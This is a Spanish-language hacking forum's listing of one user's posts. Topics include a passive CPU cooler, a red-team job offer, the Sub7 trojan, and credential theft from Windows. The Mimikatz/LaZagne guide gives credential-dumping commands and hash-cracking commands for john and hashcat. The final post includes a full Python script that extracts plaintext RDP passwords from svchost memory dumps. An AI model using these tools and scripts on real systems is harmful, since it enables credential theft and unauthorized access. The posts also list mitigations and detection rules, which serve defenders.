elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)



  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 33
1  Informática / Hardware / Noctua presenta disipador pasivo CPU NH-P1 en: Ayer a las 12:48
⏩ Noctua presenta enorme disipador pasivo 🔄 CPU fanless NH-P1 por 110$
https://noctua.at/en/nh-p1

- 6 heatpipes ♨️ y 1.180g peso🆒

- Se pueden añadir 1-2 ventilador/es

- Capaz refrigerar Intel Core i9-11900K a 3,6 GHz con el test Prime95 (125W🔥)



Citar
   «El NH-P1 es nuestro primer disipador pasivo, y debería ser fácil ver que no solo hemos cogido un disipador normal y le hemos quitado el ventilador».- dice Roland Mossig, CEO de la compañía,- «Se ha dedicado muchísimo trabajo de ingeniería en el diseño de este disipador para que funcione sin ventilador desde cero y estamos realmente orgullosos del resultado final. En nuestro sistema de demostración completamente sin ventiladores, el Noctua NH-P1 enfría un Intel Core i9-11900K con Prime95 a más de 3,6 GHz, ¡esto significa que puede con 125W de calor sin ventiladores y sin hacer ruido!».




El Noctua NH-P1 se ha hecho esperar, pues fue anunciado por primera vez en Computex 2019, hace poco más de dos años. Desde entonces, cuando todavía era solo un proyecto, ha experimentado varios cambios en su diseño, que se han traducido en múltiples retrasos (su lanzamiento inicial estaba previsto para el cuarto trimestre de 2019). Ahora, tras un año y medio de espera desde la fecha anunciada en mayo de 2019, finalmente ha llegado al mercado.

Cajas compatibles



Para evitar el uso de ventilador, el Noctua NH-P1 cuenta con seis heatpipes de cobre que toman el calor de la superficie del procesador y lo llevan a las trece aletas de gran tamaño de aluminio niquelado que componen la parte superior del disipador. Es importante, eso sí, tener en cuenta que la caja empleada jugará un papel clave para que su capacidad de disipación sea efectiva. Aunque no son las únicas, Noctua ha publicado una lista con algunas de las las cajas recomendadas para su montaje. Como recomendaciones generales, el fabricante recomienda una caja de PC sin ventilador pero con una buena convección natural, una configuración abierta de tipo banco de pruebas, o una caja de PC con ventiladores.

https://ncc.noctua.at/recommended/NH-P1-68/cases

Listado Procesadores


Aunque al hablar de disipación pasiva solemos pensar en portátiles y ordenadores de pequeño tamaño y bajo rendimiento, disipadores como el Noctua NH-P1 parecen claramente diseñados para recordarnos que, en bastantes casos, los ventiladores no son la única solución para evacuar el calor que producen algunos de los centros neurálgicos de nuestros equipos de sobremesa. Para una caja grande, eso sí, pues como puedes comprobar en la imagen su tamaño es considerable.

El Noctua NH-P1 se ha hecho esperar, pues fue anunciado por primera vez en Computex 2019, hace poco más de dos años. Desde entonces, cuando todavía era solo un proyecto, ha experimentado varios cambios en su diseño, que se han traducido en múltiples retrasos (su lanzamiento inicial estaba previsto para el cuarto trimestre de 2019). Ahora, tras un año y medio de espera desde la fecha anunciada en mayo de 2019, finalmente ha llegado al mercado.

Para evitar el uso de ventilador, el Noctua NH-P1 cuenta con seis heatpipes de cobre que toman el calor de la superficie del procesador y lo llevan a las trece aletas de gran tamaño de aluminio niquelado que componen la parte superior del disipador. Es importante, eso sí, tener en cuenta que la caja empleada jugará un papel clave para que su capacidad de disipación sea efectiva. Aunque no son las únicas, Noctua ha publicado una lista con algunas de las las cajas recomendadas para su montaje. Como recomendaciones generales, el fabricante recomienda una caja de PC sin ventilador pero con una buena convección natural, una configuración abierta de tipo banco de pruebas, o una caja de PC con ventiladores.

Noctua NH-P1: disipación pasiva a lo bestia

En cuanto a su compatibilidad, por el lado de Intel se puede montar sobre micros en sockets LGA2066, LGA2011-0, LGA2011-3 (Square ILM), LGA1200, LGA1156, LGA1155, LGA1151 y LGA1150, y en el caso de AMD es compatible con los sockets AM2, AM2+, AM3, AM3+, FM1, FM2, FM2+ (en este caso será necesario emplear un backplate) y AM4. Más complejo es determinar los chips con los que sus capacidades de disipación serán suficientes, ya que Noctua no emplea el TDP para establecerla. Lo mejor, por lo tanto, es consultar la lista de procesadores compatibles aquí.

https://ncc.noctua.at/coolers/NH-P1-68/cpus/all

Como recomendación general, el fabricante indica que no es adecuado para sistemas en los que se haga overclocking, así como con procesadores que produzcan altas cargas térmicas. Fuera de este punto, eso sí, es posible utilizarlo con chips de última generación.

Si te preguntas por su tamaño, es prácticamente cúbico, con 158 milímetros de altura, 154 de anchura y 152 de fondo. Y para que quede clara la contundencia del Noctua NH-P1, su peso es de nada menos que 1.180 gramos. Medidas sin ventilador, pues aunque ha sido diseñado para funcionar de este modo, también permite el montaje de un ventilador de 120 milímetros, fin para el que Noctua recomienda su modelo NF-A12x25 LS-PWM.

El Noctua NH-P1ya se encuentra a la venta y su precio, sin ventilador pero con el kit de montaje completo, incluida la pasta térmica, es de 109,90 euros.



El disipador es sorprendentemente capaz, aunque como vemos se recomienda la inclusión de un ventilador. En concreto, se ofrece el NF-A12x25 LS-PWM como una ampliación opcional, siendo un ventilador semi-pasivo, por lo que podremos configurar su curva para que se mantenga sin funcionar la mayor parte del tiempo, y no perder la esencia de este disipador pasivo.

Citar
   Este ventilador opcional tiene un ruido máximo de 12.1db(A), ya que es de muy baja velocidad, perfecto para evitar eliminar la esencia de este disipador pasivo.


2  Seguridad Informática / Seguridad / Oferta de Trabajo: Mercadona buscar un hacker - Pentester - Red Team en: 8 Junio 2021, 23:35 pm
Mercadona busca un hacker Técnico de Seguridad Ofensiva para protegerse del ransomware

Mercadona ha abierto hoy una vacante en su portal de empleo para seleccionar un Técnico en Seguridad Ofensiva que actúe como hacker, poniendo a prueba los sistemas de la compañía. Los ataques de ransomware y otros vectores están a la orden del día teniendo como objetivo las grandes empresas y la cadena de supermercados quiere tener a un aliado experto entre sus filas.

La plaza resulta bastante asequible puesto que solo se exige conocimientos en seguridad ofensiva y en el uso de lenguajes como Python, Bash, Golang y Java, además de pasión por las nuevas tecnologías. Sin embargo, se valora conocimientos más avanzados como:

Citar
Requisitos:

- Conocimientos en seguridad ofensiva y en el uso de alguno de los siguientes lenguajes: Python, Bash, Golang, Java
- Disponibilidad horaria de lunes a viernes
- Carné de conducir y vehículo propio
- Capacidad de comunicación y trabajo en equipo
- Pasión e interés por las nuevas tecnologías

Conocimientos específicos

Se valorará:
- CFGS en Seguridad Informática o Grado en Ingeniería Informática o Telecomunicaciones
- Conocimientos de metodologías de pruebas de seguridad (OWASP, OSSTMM, SANS, OWISAM, OASAM)
- Experiencia en ejercicios Red Team y/o pentesting
- Certificado en CEH, OSCP, OSCE, CISSP, CISA, CISM, etc

Tareas

Buscamos técnicos/as para unirse al equipo de trabajo que está desarrollando la tecnología para abordar la transformación digital de la empresa.

Tus tareas serán:
- Poner a prueba la seguridad de los sistemas (ej. detectar y explotar vulnerabilidades en los sistemas)
- Utilizar herramientas para automatización de ataques (ej. nikto, metasploit, ZAP, burp suite, etc.)
- Realizar ejercicios periódicos de seguridad simulando escenarios (ej. simular ataque externo, robo de credenciales, accesos no autorizados, etc.)

El contrato es indefinido con jornada laboral completa y un salario bruto de entre 23 a 35 mil € anuales.


Oferta:
https://mercadona.avature.net/es_ES/Careers/JobDetail/T-CNICO-A-SEGURIDAD-OFENSIVA-RED-TEAM/27534#

Oferta de empleo en Linkedin
https://es.linkedin.com/jobs/view/t%C3%A9cnico-a-seguridad-ofensiva-red-team-at-mercadona-2583174591



Fuente:
https://bandaancha.eu/foros/mercadona-ofrece-puesto-tecnico-1743004
3  Seguridad Informática / Análisis y Diseño de Malware / Vuelve troyano RAT Sub7Seven 2021 en: 8 Junio 2021, 11:49 am
Sub7crew, los creadores del popular Sub7 RAT (Troyano de Acceso Remoto), han regresado después de varios años de inactividad

El legendario RAT (Troyano de Acceso Remoto) vuelve en 2021. Nacido en 1999.



https://sub7crew.org

Historia:
https://www.sub7crew.org/history/

Se hizo realmente popular en los años 199-2000 y 2001 justo cuando nació el foro.

En 2010 también "volvió" tras 6 años de parón:

Citar
El proyecto de la herramienta de administración remota (con ciertas funcionalidades especiales propias de un troyano) SubSeven ha vuelto, tras 6 años descansando con unas merecidas vacaciones. El pasado verano, su creador, mobman, hizo públicas sus intenciones de retomar este proyecto, y finalmente ya se ha lanzado la nueva versión, correspondiente con la 2.3.
Es uno de los troyanos más famosos de la época, que cualquier persona quería saber como utilizar, sin discriminar edad, sexo, condición o motivaciones. La mayoría tenía claro que servía para entrar en el ordenador de X y que todo el mundo picaba por messenger. Programado en Borland Delphi, ha pasado por más de 15 versiones, algunas de ellas creadas especialmente para determinadas ocasiones (Para la octava edición de DefCON, la 2.1.5 denominada edición aniversario...). Si queréis curiosear con ellas, en esta página tendréis una recopilación de todas las publicadas:


Fuente:
http://www.securitybydefault.com/2010/03/vuelve-el-troyano-subseven-tras-6-anos.html
4  Seguridad Informática / Hacking Básico / Herramientas Extracción Credenciales de Windows: Mimikatz y LaZagne en: 3 Junio 2021, 18:33 pm
Mimikatz (mimi katz) se convirtió en una herramienta de ataque extremadamente efectiva contra los clientes de Windows, permitiendo recuperar las contraseñas seguras, así como los hashes de contraseñas en memoria. Bautizada como la navaja suiza de las herramientas de obtención de credenciales para Windows como también , Windows Credential Editor (WCE) de Hernán Ochoa.



Mimikatz, escrito por primera vez por el francés Benjamin Delpy (akk gentilkiwi) en 2011, ha simplificado y automatizado en gran medida la recopilación de credenciales en los sistemas de Windows.

Mimikatz: cute cat


Mimikatz es una utilidad de código abierto que permite ver la información de credenciales del Windows lsass (Servicio de Subsistema de la Autoridad de Seguridad Local) a través de su módulo sekurlsa que incluye contraseñas de texto plano y tickets Kerberos que luego podrían usarse para ataques como pass-the-hash y pase el boleto. La mayoría de las herramientas antivirus detectarán la presencia de Mimikatz como una amenaza y la eliminarán, pero puede ser interesante probar la seguridad en los sistemas.

Mimikatz proporciona una gran cantidad de herramientas para recopilar y hacer uso de Windows credenciales en los sistemas de destino, incluida la recuperación de contraseñas de texto claro, Lan Manager hashes y hashes NTLM, certificados y tickets de Kerberos. Las herramientas se ejecutan con diferentes éxito en todas las versiones de Windows desde XP hacia adelante, con una funcionalidad algo limitado en Windows 8.1 y posterior.




También ha salido a relucir como un componente de dos gusanos ransomware que han atravesado Ucrania y se han extendido por Europa, Rusia y EE. UU .: Tanto el ransomware NotPetya como BadRabbit utilizaron a Mimikatz junto con herramientas filtradas de la NSA para crear ataques automatizados cuyas infecciones saturaron rápidamente las redes, con resultados desastrosos. NotPetya solo llevó a la parálisis de miles de computadoras en compañías como Maersk, Merck y FedEx, y se cree que ha causado más de mil millones de dólares en daños y perjuicios.






NTHash (NTLM)

Así es como se almacenan las contraseñas en los sistemas Windows. Este tipo de hash se puede obtener volcando la base de datos SAM o usando Mimikatz. También se almacenan en controladores de dominio en el archivo NTDS. Estos son los hash que puede utilizar para pasar la técnica de hash.




Ejemplo de NTHash:


Citar
dfdedf4b5ec0e2f9042db9ccef992507



NTHashes se almacenan en la base de datos del Administrador de cuentas de seguridad (SAM) y en la base de datos NTDS.dit del controlador de dominio. Un volcado de hash de Windows se verá así:




Citar
Administrador: 500: aad3b435b51404eeaad3b435b51404ee: dfdedf4b5ec0e2f9042db9ccef992507 :::



Que tiene este formato:


Código:
<Nombre de usuario>: <ID de usuario>: <Hash LM>: <Hash NT>: <Comment>: <Home Dir>:


Cuando veas que el hash de LM es aad3b435b51404eeaad3b435b51404ee, es el hash literal de sin contraseña y esto depende de su herramienta de volcado, también puede encontrar esta cadena llena de ceros. Esto es así cuando el hash LM está vacío.


Crackear


Citar
john --format = nt hash.txt

hashcat -m 1000 -a 3 hash.txt


Net-NTLMv1 / v2 también conocido como NTLMv1 / v2Permalink


El protocolo Net-NTLM utiliza NTHash en un desafío / respuesta entre un servidor y un cliente.


Puede obtener estos valores hash cuando utilice herramientas como Responder o Inveigh.

Citar
admin :: N46iSNekpT: 08ca45b7d7ea58ee: 88dcbe4446168966a153a0064958dac6: 5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c30db765


Net-NTLMv1


Citar
john --format = netntlm hash.txt

hashcat -m 5500 -a 3 hash.txt




Net-NTLMv2


Citar
john --format = netntlmv2 hash.txt

hashcat -m 5600 -a 3 hash.txt


WDigest


Mimikatz se convirtió por primera vez en un activo clave para hackers gracias a su capacidad para explotar una oscura función de Windows llamada WDigest. Esa función está diseñada para hacer que sea más conveniente para los usuarios de Windows corporativos y gubernamentales probar su identidad a diferentes aplicaciones en su red o en la web; contiene sus credenciales de autenticación en la memoria y las reutiliza automáticamente, por lo que solo tienen que ingresar su nombre de usuario y contraseña una vez. Mientras Windows mantiene cifrada la copia de la contraseña del usuario, también guarda una copia de la clave secreta para descifrarla también en la memoria


En 2014, Microsoft respondió a este agujero de seguridad con un parche que permite a los administradores del sistema deshabilitar las contraseñas "WDigest" para que no se almacenen. Este aviso de Microsoft explica cómo deberán actualizar una entrada de registro especial.


Citar
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest



https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a



Esta solución Fix it cambia la clave del Registro UseLogonCredential para que las contraseñas WDigest no se almacenen en la memoria.


En Windows 8 y superiores, la configuración predeterminada es no almacenar contraseñas de texto claro en lsass.





mimikatz viene en dos sabores: x64 o Win32, dependiendo de su versión de Windows (32/64 bits).
El sabor de Win32 no puede acceder a la memoria de proceso de 64 bits (como lsass), pero puede abrir un minivolcado de 32 bits en Windows 64 bits. Algunas operaciones necesitan privilegios de administrador o token de sistema, así que tenga en cuenta el UAC de la versión de Vista.

https://github.com/gentilkiwi/mimikatz/




privilege::debug
inject::process lsass.exe s
ekurlsa.dll@getLogonPasswords
sekurlsa::logonpasswords

Más ejemplos de uso:

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html



Módulos de uso de mimikatz con Metasploit



Citar
meterpreter > mimikatz_command -f fu::
Module : 'fu' introuvable

Modules disponibles :
                - Standard
      crypto    - Cryptographie et certificats
        hash    - Hash
      system    - Gestion système
     process    - Manipulation des processus
      thread    - Manipulation des threads
     service    - Manipulation des services
   privilege    - Manipulation des privilèges
      handle    - Manipulation des handles
 impersonate    - Manipulation tokens d'accès
     winmine    - Manipulation du démineur
 minesweeper    - Manipulation du démineur 7
       nogpo    - Anti-gpo et patchs divers
     samdump    - Dump de SAM
      inject    - Injecteur de librairies
          ts    - Terminal Server
      divers    - Fonctions diverses n'ayant pas encore assez de corps pour
avoir leurs propres module
    sekurlsa    - Dump des sessions courantes par providers LSASS
         efs    - Manipulations EFS



https://www.offensive-security.com/metasploit-unleashed/mimikatz/




Módulos de mimikatz

standard
privilege
crypto
sekurlsa
kerberos
lsadump
vault
token
event
ts
process
service
net
misc
library mimilib
driver mimidrv




Características técnicas (features)

- Dump credentials from LSASS (Windows Local Security Account database)
- MSV1.0: hashes & keys (dpapi)
- Kerberos password, ekeys, tickets, & PIN
- TsPkg (password)
- WDigest (clear-text password)
- LiveSSP (clear-text password)
- SSP (clear-text password)
- Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
- Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
- Export certificates and keys (even those not normally exportable).
- Dump cached credentials
- Stop event monitoring.
- Bypass Microsoft AppLocker / Software Restriction Polcies
- Patch Terminal Server
- Basic GPO bypass

lsadump::postzerologon, vulnerabilidad CVE-2020-1472 aka ZeroLogon detection, exploit, DCSync support (Netlogon Elevation of Privilege Vulnerability)



Reglas Yara para la detección de la herramienta

https://yara.adlice.com/view.php?id=12339



Fuentes:
https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/

Proyecto LaZagne



El proyecto LaZagne es un aplicación de código abierto usada para recuperar multitud de contraseñas almacenadas en equipos locales. Muchos productos de software almacenan contraseñas de acceso usando diferentes técnicas, desde el texto plano común, pasando por bases de datos, API's y algoritmos propios.

Windows:


- Autologon
- MSCache
- Credential Files
- Credman
- DPAPI Hash
- Hashdump (LM/NT)
- LSA secret
- Vault Files


Esta herramienta fue desarrollada con el propósito de encontrar dichas contraseñas para los productos de software más comúnmente usados. Actualmente soporta multidud de programas de Windows y múltiples sistemas operativos Linux/Unix:







En el repositorio GitHub del producto hay mayores detalles sobre su uso y alternativas para extenderlo.

https://github.com/AlessandroZ/LaZagne



Una precaución importante que podemos tomar en nuestros equipos, para evitar los hallazgos de programas como LaZagne es limpiar los rastros de nuestras actividades, por ejemplo a través de un programa como CCleaner (si bien no elimina todo lo que LaZagne encuentra, si lo hace con todo lo relacionado a las pistas que quedan del uso de los navegadores de Internet por ejemplo).


Elaboración propia con

Fuentes varias:
https://arduinosecurity.blogspot.com.es/2016/07/el-proyecto-lazagne.html
Vía:
http://blog.segu-info.com.ar/2017/11/lazagne-recupera-contrasenas.html
5  Foros Generales / Foro Libre / Excelente video sobre privacidad en iPhone en: 26 Mayo 2021, 16:37 pm
Anuncio sobre la privacidad de iPhone (Apple)



Es de un país sudamericano por el acento, creo que México ¿?

El anuncio está relacionado con los nuevos permisos de privacidad de Apple

App Tracking Transparency en los dispositivos Apple
https://blog.elhacker.net/2021/05/actualizacion-ios-14-5-trae-nuevos-controles-de-privacidad-app-tracking.html
6  Foros Generales / Foro Libre / Crean un inodoro inteligente capaz de analizar heces para detectar y tratar problemas de salud en: 26 Mayo 2021, 13:20 pm
La Universidad de Duke (EE. UU.) ha diseñado un dispositivo con un algoritmo para evaluar la forma y detectar sangre en los excrementos de los pacientes.




La Universidad de Duke (Estados Unidos) está desarrollando un dispositivo con inteligencia artificial que puede incorporarse al inodoro y analizar las heces de las personas. Según su presentación en la Digestive Disease Week, este invento podría dotar a los gastroenterólogos de la información necesaria para encontrar el tratamiento ideal para los pacientes.
‘El inodoro inteligente’ es capaz de reconocer a cada usuario por su ‘huella anal’.
Así es el 'inodoro inteligente’, un váter capaz de reconocer a cada usuario por sus deposiciones y monitorizar su salud

Los desarrolladores, que han llamado a esta herramienta ‘Duke Smart Toilet Lab’ han explicado que esta tecnología ayudaría a aquellos que cuentan con problemas gastrointestinales crónicos, como la enfermedad inflamatoria intestinal y el síndrome del intestino irritable.

Deborah Fisher, una de las autoras del estudio y profesora asociada de medicina en la Universidad de Duke explica que “por lo general, los gastroenterólogos tienen que confiar en la información sobre las heces que el propio paciente les comunica para ayudar a determinar la causa de sus problemas de salud gastrointestinales, lo cual puede ser muy poco fiable”.

“Los pacientes a menudo no pueden recordar el aspecto de sus heces o la frecuencia con la que defecan, lo que forma parte del proceso de control estándar -señala Fisher-. La tecnología del inodoro inteligente nos permitirá reunir la información a largo plazo necesaria para realizar un diagnóstico más preciso y oportuno de los problemas gastrointestinales crónicos”.

El estudio asegura que el dispositivo que han desarrollado ofrecería datos sobre los excrementos para mejorar la salud individual y comunitaria. Para ello, la investigación se centra en el diseño de una tecnología que recoja y analice las heces y la orina, una tecnología que haga una evaluación intestinal y el desarrollo de soluciones para obtener una detección rápida y responder a los brotes de enfermedades.

El Duke Smart Toilet Lab puede instalarse en las tuberías de un inodoro ya existente. Con este aparato, el inodoro toma imágenes de las heces dentro de las tuberías y, con los datos recogidos, permite que los expertos puedan conocer mejor la salud del paciente.

Los investigadores del estudio afirman que, para crear su herramienta de imágenes, analizaron 3.328 imágenes de heces encontradas en Internet o proporcionadas por los propios participantes. Estas fueron revisadas por gastroenterólogos según la escala de heces de Bristol.

La escala de heces de Bristol.Cabot Health, Bristol Stool Chart





A través de un enfoque de redes neuronales convolucionales, lograron un algoritmo que era capaz de clasificar con precisión la forma de las heces el 84’1% de las veces. Asimismo, este algoritmo también detectaba la sangre bruta el 76’3% de las veces.

Sonia Grego, investigadora principal del estudio y directora fundadora del Duke Smart Toilet Lab, afirmó que “un brote de una enfermedad inflamatoria intestinal podría diagnosticarse con el inodoro inteligente”. “Esto podría ser especialmente útil para los pacientes que viven en centros de atención a largo plazo que no pueden informar de sus condiciones y podría ayudar a mejorar el diagnóstico inicial de las patologías agudas”, confirma Grego.

Aunque el prototipo no esté disponible para el público, los investigadores se muestran positivos por su viabilidad prometedora.

Fuente:
https://www.20minutos.es/tecnologia/moviles-dispositivos/crean-un-inodoro-inteligente-capaz-de-analizar-heces-para-detectar-y-tratar-problemas-de-salud-4706977/
7  Foros Generales / Foro Libre / Curiosa publicidad de Google Adsense en: 26 Mayo 2021, 13:17 pm
Muy rara la imagen de la publicidad de Google:



Me imagino que ya han retirado el anuncio por no cumplir con la normativa.

URL donde apreció el anuncio:

https://ubunlog.com/he-probado-ubuntu-21-04-en-la-raspberry-pi-4-y-lo-siento-pero-no/
Y el enlace llevaba a:

https://achuweinch.cf/?utm_term=&utm_content=523656323270&utm_campaign=13230577911&utm_position=none&utm_network=d&utm_target=&utm_placement=ubunlog.com&utm_match=

Supporting subsistence farming while conserving land and biodiversity in Morocco

Nada que ver con la foto....
8  Programación / Desarrollo Web / Captcha basado en el juego DOOM en: 26 Mayo 2021, 10:47 am
Un Captcha que se resuelve jugando DOOM (juego de ID Software)

Es una prueba de concepto, nada funcional, pero es una idea bien ingeniosa




Demo:
https://vivirenremoto.github.io/doomcaptcha/

Desde luego es una forma muy original y más divertida de completar el tradicional  - típico captcha de imágenes.
9  Seguridad Informática / Wireless en Linux / Wifislax 64 KDE 5 Plasma en: 19 Mayo 2021, 17:09 pm


Hashcat = O.K.
Navegación Chrome = O.K.
Panel de control de Nvidia = O.K.
Airgeddon = O.K.

19/05/2021
01 - Actualizado pocl-1.6 --> 1.7
02 - Actualizados firmwares de sistema
03 - Actualizado hcxtools-6.1.6 --> 6.2.0
04 - Actualizado hcxkeys-6.0.0 --> 6.2.0
05 - Actualizado hcxdumptool-6.1.6 --> 6.2.0

Descarga:
https://mega.nz/folder/P1YDBKYK#-X1zV0zIjpDuVi8Cc9ZAgA

ISO
https://mega.nz/file/W0w2DQKI#UyG039eZcV4TFwLUri15uRQhj45HsueNsC6blYE-4Q0

Mirror
https://ns2.elhacker.net/isos/WIFISLAX-CURRENT-PLASMA.zip

Entrada en el blog:
https://blog.elhacker.net/2021/05/isponible-la-ultima-version-wifislax64-2021-kde5-plasma.html
10  Seguridad Informática / Bugs y Exploits / Extraer credenciales RDP en memoria de svchost.exe en: 18 Mayo 2021, 12:38 pm
Es posible extraer credenciales (usuario y contraseña) de inicio de sesión en texto plano en Windows escritorio remoto (RDP) del proceso de svchost.exe

Así lo ha descubierto el investigador Jonas, famoso recientemente por descubrir dos bugs (errores) en el sistema de archivos NTFS

Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html


Una simple búsqueda de cadena dentro de la memoria del proceso para svchost.exe revela la contraseña de texto sin formato que se utilizó para conectarse al sistema a través de RDP.

- La contraseña de texto sin formato está presente. La mayoría de los sistemas Windows modernos ya no tienen wdigest habilitado, por lo que encontrar credenciales de texto sin formato en la memoria es mucho más raro.
- La contraseña está en svchost.exe, a diferencia de lsass.exe. Esto significa que es posible que las herramientas defensivas para detectar / evitar el volcado de contraseñas de la memoria no puedan detectar esto.

Probé esto varias veces, así como muchas otras, y hasta ahora he observado lo siguiente:

- Esto parece funcionar en Windows 10, Windows Sever 2016, Windows Server 2012. Probablemente también en otros, pero hasta ahora lo he visto exitoso contra ellos.
- Según el autor del tweet y otros evaluadores, parece funcionar para cuentas locales y de dominio.
- No parece ser consistente. A veces, la contraseña está ahí, a veces no. No sé exactamente por qué es así. Parece existir en la memoria durante un largo período de tiempo, pero se desconoce cuánto tiempo.


Encuentra el proceso correcto. He visto algunas formas de hacerlo.

    Utilizando la herramienta Process Hacker 2. Ves a la pestaña Red y busca el proceso que tiene una conexión RDP. Esto solo funciona si la conexión RDP aún está activa.




Visto en:
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

El creador de la conocida herramienta mimikatz ha añadido recientemente la funcionalidad:





2.2.0 20210517 Terminal Server Passwords
https://github.com/gentilkiwi/mimikatz/releases

Mitigaciones:

Protect Remote Desktop credentials with Windows Defender Remote Credential Guard
https://docs.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard

Windows Defender Credential Guard: Requirements
https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements


Script Python
RDP_clear.py
https://gist.github.com/k4nfr3/ca2c392572da645661b62f9a71f28ba3

Código
  1. import re
  2. from collections import namedtuple
  3. import sys
  4.  
  5. # Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
  6. # borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
  7. # code inspired by  @gentilkiwi 's video
  8. # This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
  9. # I'm no dev so PR and constructive remarks are welcome
  10.  
  11.  
  12. ASCII_BYTE = rb" !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t"
  13.  
  14. RDP_Strings = ['RDPDD', 'RDV::RDP::NetDetect::BandwidthChange']  #Server 2008 and Server 2016 tested only
  15.  
  16. String = namedtuple("String", ["s", "offset"])
  17.  
  18.  
  19. def ascii_strings(buf, n=4):
  20.    reg = rb"([%s]{%d,})" % (ASCII_BYTE, n)
  21.    ascii_re = re.compile(reg)
  22.    for match in ascii_re.finditer(buf):
  23.        yield String(match.group().decode("ascii"), match.start())
  24.  
  25. def unicode_strings(buf, n=4):
  26.    reg = rb"((?:[%s]\x00){%d,})" % (ASCII_BYTE, n)
  27.    uni_re = re.compile(reg)
  28.    for match in uni_re.finditer(buf):
  29.        try:
  30.            yield String(match.group().decode("utf-16"), match.start())
  31.        except UnicodeDecodeError:
  32.            pass
  33.  
  34.  
  35. def getdomain(buf):
  36.    return buf.decode("UTF-16)")
  37.  
  38. def banner():
  39.    print(' _____ ____  _____           _             ')
  40.    print('| __  |    \|  _  |      ___| |___ ___ ___ ')
  41.    print('|    -|  |  |   __|     |  _| | -_| .\'|  _|')
  42.    print('|__|__|____/|__|   _____|___|_|___|__,|_|  ')
  43.    print('                  |_____|                  ')
  44.  
  45.  
  46.  
  47. def main():
  48.    import sys
  49.  
  50.    SVCHOST = False
  51.    Last1 = ""
  52.    Last2 = ""
  53.    Last3 = ""
  54.    SERVERNAME=""
  55.    with open(sys.argv[1], 'rb') as f:
  56.        b = f.read()
  57.  
  58.    for s in ascii_strings(b, n=4):
  59.        if format(s.s).find("svchost.exe -k termsvcs")!=-1:
  60.            print('[*] Analyse of dump of process : {:s}'.format( s.s))
  61.            SVCHOST = True
  62.        if format(s.s).find("COMPUTERNAME=")!=-1:
  63.            #print('[+] SERVERNAME : ' +s.s[13:])
  64.            SERVERNAME=s.s[13:]
  65.            break
  66.  
  67.    if (SVCHOST):
  68.        print("\n")
  69.        for s in unicode_strings(b):
  70.            #print('[+] {:d} 0x{:d}: {:s}'.format(0,s.offset, s.s))
  71.  
  72.            if s.s in RDP_Strings:
  73.                if (s.offset - Last1.offset) < 3000:
  74.                    if (Last1.offset-Last2.offset==512):
  75.                        #print('[+] User :{:d} 0x{:d}: {:s}'.format((s.offset - Last2.offset), Last2.offset, Last2.s))
  76.                        print('[+] User : \t{:s}'.format(Last2.s))
  77.                        #print('[+] Password : {:d} 0x{:d}: {:s}'.format((s.offset - Last1.offset), Last1.offset, Last1.s))
  78.                        print('[+] Password : \t{:s}'.format(Last1.s))
  79.                        if ((Last2.offset-Last3.offset) == 512) :
  80.                            print('[+] Domain : \t{:d} 0x{:d}: {:s}'.format((s.offset - Last3.offset), Last3.offset, Last3.s))
  81.                            break
  82.                        else:
  83.                            # bug in case string is less than 4 char
  84.                            domain = b[Last2.offset-512:Last2.offset]
  85.                            if getdomain(domain).strip('\x00')!="":
  86.                                print('[+] Domain : \t{:s}'.format(getdomain(domain)))
  87.                            else:  # can be empty, then it's local
  88.                                print("[+] ServerName : \t"+SERVERNAME)
  89.                            break
  90.  
  91.            Last3=Last2
  92.            Last2=Last1
  93.            Last1=s
  94.  
  95.    else:
  96.        print(sys.argv[1] + " doesn't seem to be a svchost dump file")
  97.  
  98.  
  99. if __name__ == "__main__":
  100.    banner()
  101.    if len(sys.argv) != 2:
  102.        print("\n\nDump svchost process which listens to port 3389 port with any procdump tool")
  103.        print("")
  104.        print("Usage: " + sys.argv[0] + " svchost.dmp")
  105.        exit(0)
  106.    main()
  107.  

Otras herramientas extracción credenciales en Windows

- mimikatz https://github.com/gentilkiwi/mimikatz
- Proyecto LaZagne https://github.com/AlessandroZ/LaZagne/
- Pypykatz (mimikatz) en Python https://github.com/skelsec/pypykatz
- Nishang (PowerShell) https://github.com/samratashok/nishang
- CrackMapExec CME https://github.com/byt3bl33d3r/CrackMapExec
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 33
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines